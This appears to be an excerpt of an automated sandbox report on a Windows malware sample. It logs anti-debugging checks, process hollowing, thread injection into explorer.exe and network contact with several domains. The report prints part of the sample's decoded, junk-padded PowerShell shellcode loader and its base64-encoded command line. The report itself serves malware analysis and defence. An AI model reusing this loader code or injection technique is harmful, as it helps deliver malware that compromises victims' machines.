      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h]26_2_034A51BE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03440050 mov eax, dword ptr fs:[00000030h]26_2_03440050
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03440050 mov eax, dword ptr fs:[00000030h]26_2_03440050
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F1074 mov eax, dword ptr fs:[00000030h]26_2_034F1074
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034E2073 mov eax, dword ptr fs:[00000030h]26_2_034E2073
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F4015 mov eax, dword ptr fs:[00000030h]26_2_034F4015
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F4015 mov eax, dword ptr fs:[00000030h]26_2_034F4015
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h]26_2_034A7016
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h]26_2_034A7016
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h]26_2_034A7016
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345002D mov eax, dword ptr fs:[00000030h]26_2_0345002D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345002D mov eax, dword ptr fs:[00000030h]26_2_0345002D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345002D mov eax, dword ptr fs:[00000030h]26_2_0345002D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345002D mov eax, dword ptr fs:[00000030h]26_2_0345002D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345002D mov eax, dword ptr fs:[00000030h]26_2_0345002D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h]26_2_0343B02A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h]26_2_0343B02A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h]26_2_0343B02A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h]26_2_0343B02A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov ecx, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h]26_2_034BB8D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034258EC mov eax, dword ptr fs:[00000030h]26_2_034258EC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429080 mov eax, dword ptr fs:[00000030h]26_2_03429080
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A3884 mov eax, dword ptr fs:[00000030h]26_2_034A3884
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A3884 mov eax, dword ptr fs:[00000030h]26_2_034A3884
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h]26_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034690AF mov eax, dword ptr fs:[00000030h]26_2_034690AF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345F0BF mov ecx, dword ptr fs:[00000030h]26_2_0345F0BF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345F0BF mov eax, dword ptr fs:[00000030h]26_2_0345F0BF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345F0BF mov eax, dword ptr fs:[00000030h]26_2_0345F0BF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343EF40 mov eax, dword ptr fs:[00000030h]26_2_0343EF40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343FF60 mov eax, dword ptr fs:[00000030h]26_2_0343FF60
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F8F6A mov eax, dword ptr fs:[00000030h]26_2_034F8F6A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F070D mov eax, dword ptr fs:[00000030h]26_2_034F070D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F070D mov eax, dword ptr fs:[00000030h]26_2_034F070D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A70E mov eax, dword ptr fs:[00000030h]26_2_0345A70E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A70E mov eax, dword ptr fs:[00000030h]26_2_0345A70E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344F716 mov eax, dword ptr fs:[00000030h]26_2_0344F716
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BFF10 mov eax, dword ptr fs:[00000030h]26_2_034BFF10
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BFF10 mov eax, dword ptr fs:[00000030h]26_2_034BFF10
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03424F2E mov eax, dword ptr fs:[00000030h]26_2_03424F2E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03424F2E mov eax, dword ptr fs:[00000030h]26_2_03424F2E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345E730 mov eax, dword ptr fs:[00000030h]26_2_0345E730
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034637F5 mov eax, dword ptr fs:[00000030h]26_2_034637F5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03438794 mov eax, dword ptr fs:[00000030h]26_2_03438794
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h]26_2_034A7794
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h]26_2_034A7794
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h]26_2_034A7794
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h]26_2_03437E41
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EAE44 mov eax, dword ptr fs:[00000030h]26_2_034EAE44
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EAE44 mov eax, dword ptr fs:[00000030h]26_2_034EAE44
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343766D mov eax, dword ptr fs:[00000030h]26_2_0343766D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h]26_2_0344AE73
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h]26_2_0344AE73
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h]26_2_0344AE73
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h]26_2_0344AE73
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h]26_2_0344AE73
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h]26_2_0342C600
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h]26_2_0342C600
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h]26_2_0342C600
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03458E00 mov eax, dword ptr fs:[00000030h]26_2_03458E00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034E1608 mov eax, dword ptr fs:[00000030h]26_2_034E1608
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A61C mov eax, dword ptr fs:[00000030h]26_2_0345A61C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A61C mov eax, dword ptr fs:[00000030h]26_2_0345A61C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342E620 mov eax, dword ptr fs:[00000030h]26_2_0342E620
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034DFE3F mov eax, dword ptr fs:[00000030h]26_2_034DFE3F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03468EC7 mov eax, dword ptr fs:[00000030h]26_2_03468EC7
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034536CC mov eax, dword ptr fs:[00000030h]26_2_034536CC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034DFEC0 mov eax, dword ptr fs:[00000030h]26_2_034DFEC0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F8ED6 mov eax, dword ptr fs:[00000030h]26_2_034F8ED6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034376E2 mov eax, dword ptr fs:[00000030h]26_2_034376E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034516E0 mov ecx, dword ptr fs:[00000030h]26_2_034516E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BFE87 mov eax, dword ptr fs:[00000030h]26_2_034BFE87
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h]26_2_034F0EA5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h]26_2_034F0EA5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h]26_2_034F0EA5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A46A7 mov eax, dword ptr fs:[00000030h]26_2_034A46A7
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03463D43 mov eax, dword ptr fs:[00000030h]26_2_03463D43
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A3540 mov eax, dword ptr fs:[00000030h]26_2_034A3540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03447D50 mov eax, dword ptr fs:[00000030h]26_2_03447D50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344C577 mov eax, dword ptr fs:[00000030h]26_2_0344C577
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344C577 mov eax, dword ptr fs:[00000030h]26_2_0344C577
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342AD30 mov eax, dword ptr fs:[00000030h]26_2_0342AD30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h]26_2_03433D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EE539 mov eax, dword ptr fs:[00000030h]26_2_034EE539
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F8D34 mov eax, dword ptr fs:[00000030h]26_2_034F8D34
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034AA537 mov eax, dword ptr fs:[00000030h]26_2_034AA537
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h]26_2_03454D3B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h]26_2_03454D3B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h]26_2_03454D3B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov ecx, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h]26_2_034A6DC9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343D5E0 mov eax, dword ptr fs:[00000030h]26_2_0343D5E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343D5E0 mov eax, dword ptr fs:[00000030h]26_2_0343D5E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h]26_2_034EFDE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h]26_2_034EFDE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h]26_2_034EFDE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h]26_2_034EFDE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034D8DF1 mov eax, dword ptr fs:[00000030h]26_2_034D8DF1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452581 mov eax, dword ptr fs:[00000030h]26_2_03452581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452581 mov eax, dword ptr fs:[00000030h]26_2_03452581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452581 mov eax, dword ptr fs:[00000030h]26_2_03452581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452581 mov eax, dword ptr fs:[00000030h]26_2_03452581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h]26_2_03422D8A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h]26_2_03422D8A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h]26_2_03422D8A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h]26_2_03422D8A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h]26_2_03422D8A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345FD9B mov eax, dword ptr fs:[00000030h]26_2_0345FD9B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345FD9B mov eax, dword ptr fs:[00000030h]26_2_0345FD9B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F05AC mov eax, dword ptr fs:[00000030h]26_2_034F05AC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F05AC mov eax, dword ptr fs:[00000030h]26_2_034F05AC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034535A1 mov eax, dword ptr fs:[00000030h]26_2_034535A1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h]26_2_03451DB5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h]26_2_03451DB5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h]26_2_03451DB5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A44B mov eax, dword ptr fs:[00000030h]26_2_0345A44B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BC450 mov eax, dword ptr fs:[00000030h]26_2_034BC450
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034BC450 mov eax, dword ptr fs:[00000030h]26_2_034BC450
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344746D mov eax, dword ptr fs:[00000030h]26_2_0344746D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h]26_2_034A6C0A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h]26_2_034A6C0A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h]26_2_034A6C0A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h]26_2_034A6C0A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F740D mov eax, dword ptr fs:[00000030h]26_2_034F740D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F740D mov eax, dword ptr fs:[00000030h]26_2_034F740D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC86A60 rdtscp 23_2_1EC86A60
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC996E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_1EC996E0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.dentalbatonrouge.com
      Source: C:\Windows\explorer.exeDomain query: www.yzicpa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 108.175.14.116 80Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #AIRED Sengelej Vendeta8 TEISTE Foelelsesm9 antityro TILS BLGFRU Bydef5 Mili5 Appos softfontet alko nonmarket Modis Mois Unveiled Unemac garblesf teena SHUTTLE Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Ofayve1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);}"@#Hutu7 garan dysch UNUNI Stor OVERIN liftma Electrodi Irriteret4 Boninite7 ecdysonan shar Karantnest brutto antraci Fyrme Laudruptri6 despotiz Tempelk Retssik demoudgave TACTU Obju LUDICROUSC stum Unpl Outsho8 nonpos Talehm Prote2 Test-Path "jobnavn" Test-Path "DRON" $Ofayve3=0;$Ofayve9=1048576;$Ofayve8=[Ofayve1]::NtAllocateVirtualMemory(-1,[ref]$Ofayve3,0,[ref]$Ofayve9,12288,64)#aishahska whamplave Studi7 Allegre8 Particular3 Savag3 ankomstr BYGNINGSSN Speede Vinhs2 Undere8 Epuralbial SUBTEST Degra Bemean8 PRSI Soldaterhj Prostituti1 utnkel Acreages7 FORD UNSOLEM OCCUPI ACCOUT KULTU Forhaile9 pla
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #AIRED Sengelej Vendeta8 TEISTE Foelelsesm9 antityro TILS BLGFRU Bydef5 Mili5 Appos softfontet alko nonmarket Modis Mois Unveiled Unemac garblesf teena SHUTTLE Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Ofayve1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);}"@#Hutu7 garan dysch UNUNI Stor OVERIN liftma Electrodi Irriteret4 Boninite7 ecdysonan shar Karantnest brutto antraci Fyrme Laudruptri6 despotiz Tempelk Retssik demoudgave TACTU Obju LUDICROUSC stum Unpl Outsho8 nonpos Talehm Prote2 Test-Path "jobnavn" Test-Path "DRON" $Ofayve3=0;$Ofayve9=1048576;$Ofayve8=[Ofayve1]::NtAllocateVirtualMemory(-1,[ref]$Ofayve3,0,[ref]$Ofayve9,12288,64)#aishahska whamplave Studi7 Allegre8 Particular3 Savag3 ankomstr BYGNINGSSN Speede Vinhs2 Undere8 Epuralbial SUBTEST Degra Bemean8 PRSI Soldaterhj Prostituti1 utnkel Acreages7 FORD UNSOLEM OCCUPI ACCOUT KULTU Forhaile9 plaJump to behavior
      Sample uses process hollowing technique
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 3E0000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2CD0000Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABD